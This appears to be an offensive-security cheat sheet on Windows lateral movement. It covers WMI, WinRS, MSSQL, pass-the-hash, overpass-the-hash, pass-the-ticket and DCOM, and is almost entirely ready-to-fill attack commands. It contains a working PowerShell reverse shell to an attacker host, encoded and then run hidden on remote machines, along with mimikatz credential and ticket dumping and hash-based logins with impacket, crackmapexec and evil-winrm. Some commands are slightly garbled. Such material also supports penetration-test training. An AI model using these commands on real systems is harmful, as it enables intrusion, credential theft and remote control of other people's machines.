# Lateral Move

## Windows Management Instrumentation (WMI)

### Spawning a process

```
wmic /node:<RHOST> /user:<USERNAME> /password:<PASSWORD> process call create "cmd"
```

### Store Credentials

```
$username = '<USERNAME>';
$password = '<PASSWORD>';
$secureString = ConvertTo-SecureString $password -AsPlaintext -Force;
$credential = New-Object System.Management.Automation.PSCredential $username, $secureString;
```

### Instanciate Distributed Component Object MOdel (DCOM)

```batchfile
$options = New-CimSessionOption -Protocol DCOM
$session = New-Cimsession -ComputerName <RHOST> -Credential $credential -SessionOption $Options 
$command = 'cmd';
Invoke-CimMethod -CimSession $Session -ClassName Win32_Process -MethodName Create -Arguments @{CommandLine =$Command};
```

### Establish a Reverse shell

**revshell\_encoder.py**

```python
import sys
import base64

payload = '$client = New-Object System.Net.Sockets.TCPClient("<LHOST>",<LPORT>);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()'

cmd = "powershell -nop -w hidden -e " + base64.b64encode(payload.encode('utf16')[2:]).decode()

print(cmd)
```

**Payload Encoding**

```shell
python3 encode.py
```

```batchfile
powershell -nop -w hidden -e JAB<--- SNIP --->CkA
```

**Execution**

```batchfile
$username = '<USERNAME>';
$password = '<PASSWORD>';
$secureString = ConvertTo-SecureString $password -AsPlaintext -Force;
$credential = New-Object System.Management.Automation.PSCredential $username, $secureString;
$options = New-CimSessionOption -Protocol DCOM
$session = New-Cimsession -ComputerName <RHOST> -Credential $credential -SessionOption $Options 
$command = 'powershell -nop -w hidden -e JAB<--- SNIP --->CkA';
Invoke-CimMethod -CimSession $Session -ClassName Win32_Process -MethodName Create -Arguments @{CommandLine =$Command};
```

## Windows Remote Shell (WinRS)

**Prerequisites**

User needs to be part of the Administrators or Remote Management Users group on the target host

### Execution

```batchfile
winrs -r:<RHOST> -u:<USERNAME> -p:<PASSWORD> "cmd /c hostname & whoami"
winrs -r:<RHOST> -u:<USERNAME> -p:<PASSWORD> "powershell -nop -w hidden -e JAB<--- SNIP --->CkA"
```

**PowerShell**

```batchfile
$username = '<USERNAME>';
$password = '<PASSWORD>';
$secureString = ConvertTo-SecureString $password -AsPlaintext -Force;
$credential = New-Object System.Management.Automation.PSCredential $username, $secureString;
New-PSSession -ComputerName <RHOST> -Credential $credential
Enter-PSSession 1
```

## MSSQL (Port 1397)

### Find mssql access

```
cme mssql <ip> -u <user> -p <password> -d <domain>
```

### Users with SQLAdmin (BloodHound)

```
MATC p=(u:User)-[:SQLAdmin]->(c:Computer) RETURN p
```

### Trust Link

{% tabs %}
{% tab title="SQLServerLinkCrawl" %}
{% code overflow="wrap" %}

```
Get-SQLServerLinkCrawl -username <user> -password <password> -Verbose -Instance <sqlInstance> -Query "<query>"
```

{% endcode %}
{% endtab %}

{% tab title="Metasploit" %}

```
use exploit/windows
```

{% endtab %}
{% endtabs %}

### Log in

```
mssqlclient.py -windows-auth <domain>/<user>:<password>@<ip>
```

{% tabs %}
{% tab title="db" %}

```
enum_db
```

{% endtab %}

{% tab title="cmd" %}

```
xp_cmdshell <cmd>
```

{% endtab %}

{% tab title="impersonate" %}

```
exec_as_user <user>

exec_as_login <login>
```

{% endtab %}

{% tab title="trustlink" %}

```
sp_linkedservers

use_link
```

{% endtab %}
{% endtabs %}

## Local User

{% tabs %}
{% tab title="cme" %}

```
cme smb -u <user> -p <password> <ip> --local-auth
```

{% endtab %}

{% tab title="impacket" %}

```
impacket like cleartext password without domain/
```

{% endtab %}
{% endtabs %}

## ClearText Password

### Interactive Shell

{% tabs %}
{% tab title="impacket-PsExec" %}

```
impacket-psexec <user>@<IP>
```

{% endtab %}

{% tab title="PsExec.exe" %}

```
psexec.exe -AcceptEULA \\<ip>
```

{% endtab %}

{% tab title="mimikatz" %}
{% code overflow="wrap" %}

```
mimikatz "privilege::debug sekurlsa::pth /user:<user> /domain:<domain> /ntlm:<hash>"
```

{% endcode %}
{% endtab %}
{% endtabs %}

### Pseudo-shell (file write and read)

{% tabs %}
{% tab title="smbexec" %}

```
smbexec.py <domain>/<user>:<password>@<ip> "command"
```

{% endtab %}

{% tab title="wmiexec" %}

```
wmiexec.py <domain>/<user>:<password>@<ip>
```

{% endtab %}

{% tab title="cme" %}

```
crackmapexec smb <ip_range> -u <user> -p <password> -d <domain>

crackmapexec smb <ip_range> -u <user> -p <password> -local-auth
```

{% endtab %}
{% endtabs %}

### Protocols

{% tabs %}
{% tab title="WinRM" %}

```
evil-winrm -i <ip> -u <user> -p <password>
```

```
evil-winrm -i <ip> -c cert.pem -k key.pem -S
```

{% endtab %}

{% tab title="RDP" %}

```
xfreerdp /u:<user> /p:<password> /v:<ip>
```

{% endtab %}

{% tab title="SMB" %}

```
smbclient.py <domain>/<user>:<password>@<ip>
```

{% endtab %}

{% tab title="MSSQL" %}

```
cme mssql <ip_range> -u <user> -p <password> -d <domain>
impacket-mssqlclient <user>@<ip> -windows-auth
```

```
mssqlclient.py -windows-auth <domain>/<user>:<password>@<ip>
```

{% endtab %}
{% endtabs %}

## NTLM Hash

### Pass the Hash (PTH)

#### Interactive Shell

{% tabs %}
{% tab title="impacket-psexec" %}

```
impacket-psexec <user>@<IP> -hashes ':<ntlm>'
```

{% endtab %}

{% tab title="PsExec.exe" %}

```
psexec.exe -AcceptEULA \\<ip>
```

{% endtab %}

{% tab title="wmiexec" %}

{% endtab %}

{% tab title="undefined" %}
{% code overflow="wrap" %}

```
impacket-wmiexec -hashes :<ntlm> <user>@<RHOST>
```

{% endcode %}
{% endtab %}

{% tab title="mimikatz" %}
{% code overflow="wrap" %}

```
mimikatz "privilege::debug sekurlsa::pth /user:<user> /domain:<domain> /ntlm:<hash>"
```

{% endcode %}
{% endtab %}
{% endtabs %}

#### Pseudo-shell (file write and read)

{% tabs %}
{% tab title="smbexec" %}

```
smbexec.py -hashes ":<hash>" <user>@<ip> "command"
```

{% endtab %}

{% tab title="wmiexec" %}

```
wmiexec.py -hashes ":<hash>" <user>@<ip>
```

{% endtab %}

{% tab title="crackmapexec" %}

```
crackmapexec smb <ip_range> -u <user> -d <domain> -H ":<hash>"

crackmapexec smb <ip_range> -u <user> -H ":<hash>" -local-auth
```

{% endtab %}
{% endtabs %}

#### Protocols

{% tabs %}
{% tab title="WinRM" %}

```
evil-winrm -i <ip> -u <user> -H <hash>
```

{% endtab %}

{% tab title="RDP" %}

```
xfreerdp /u:<user> /d:<domain> /pth:<hash> /v:<ip>
```

{% endtab %}

{% tab title="SMB" %}

```
smbclient.py -hashes ":<hash>" <user>@<ip>
```

{% endtab %}

{% tab title="MSSQL" %}

```
cme mssql <ip_range> -H ":<hash>"
```

```
mssqlclient.py -windows-auth -hashes ":<hash>" <domain>/<user>@<ip>
```

{% endtab %}
{% endtabs %}

## Kerberos

### Overpass the Hash

We load mimikatz to grab the ntlm hash of the user that we are going to craft a kerberos ticket

```
.\mimikatz.exe
mimikatz # privilege::debug
mimikatz # sekurlsa::logonpasswords
```

The essence of the overpass the hash lateral movement technique is to turn the NTLM hash into a Kerberos ticket and avoid the use of NTLM authentication. A simple way to do this is with the **sekurlsa::pth** command from Mimikatz.

```
mimikatz # sekurlsa::pth /user:<USERNAME> /domain:<DOMAIN> /ntlm:369def79d8372408bf6e93364cc93075 /run:powershell
```

Let's list the cached Kerberos tickets with **klist**.

```
klist
```

No Kerberos tickets have been cached, but this is expected since *jen* has not yet performed an interactive login. Let's generate a TGT by authenticating to a network share on the server with **net use**.

```
net use \\<RHOST>
```

Let's confirm that now we have the ticket

```
klist
```

Let's try that now, running **.\PsExec.exe** to launch **cmd** remotely on the machine as the user.

```
.\PsExec.exe \\<RHOST> cmd
```

### Pass the Ticket (ccache / kirbi)

**PreRequisites**

Export an already existing ticket of a user

{% tabs %}
{% tab title="mimikatz.exe" %}
The above command parsed the [*LSASS*](https://learn.microsoft.com/en-us/windows-server/security/credentials-protection-and-management/configuring-additional-lsa-protection) process space in memory for any TGT/TGS, which is then saved to disk in the kirbi mimikatz format.

```
mimikatz # privilege::debug
mimikatz # sekurlsa::tickets /export
```

We can verify newly generated tickets with **dir**, filtering out on the **kirbi** extension

```
dir *.kirbi
```

As many tickets have been generated, we can just pick any TGS ticket in the <user@rhost.kirbi> format and inject it through mimikatz via the **kerberos::ptt** command.

```
mimikatz # kerberos::ptt [0;12bd0]-0-0-40810000-<USERNAME>@cifs-<RHOST>.kirbi
```

We should expect the ticket in our session when running **klist**.

```
klist
```

```
.\PsExec.exe \\<RHOST> cmd
```

{% endtab %}

{% tab title="mimikatz.ps1" %}
**Export the TGS ticket**

```
Invoke-Mimikatz -Command '"sekurlsa::tickets /export"'
```

{% code overflow="wrap" %}

```
Invoke-Mimikatz -Command ‘"kerberos::ptt <ticket>"’
```

{% endcode %}
{% endtab %}

{% tab title="Rubeus" %}

```
Rubeus.exe ptt /ticket:\<ticket>
```

{% endtab %}
{% endtabs %}

## Distributed Component Object Model (DCOM)

**Prerequisites**

Elevated PowerShell session

### Creating and storing the Distributed Component Object Model

```batchfile
$dcom = [System.Activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application.1","<RHOST>"))
$dcom.Document.ActiveView.ExecuteShellCommand("cmd",$null,"/c cmd","7")
tasklist | findstr "cmd"
$dcom.Document.ActiveView.ExecuteShellCommand("powershell",$null,"powershell -nop -w hidden -e JAB<--- SNIP --->CkA","7")
```